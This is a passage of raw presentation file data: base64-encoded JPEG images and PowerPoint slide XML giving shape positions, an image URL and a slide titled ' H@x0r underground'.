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572000" y="1202822"/>
            <a:ext cx="4370509" cy="25309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54" y="160337"/>
            <a:ext cx="4128722" cy="29524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5" name="Picture 5" descr="http://farm6.static.flickr.com/5178/5577040874_e69ca7c144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7975" y="3745216"/>
            <a:ext cx="3893085" cy="280302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349236E-9637-2DBF-BD9A-6E2FA41518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2909" y="3601625"/>
            <a:ext cx="4191000" cy="2946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9087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2425" y="457201"/>
            <a:ext cx="8644399" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> H@x0r underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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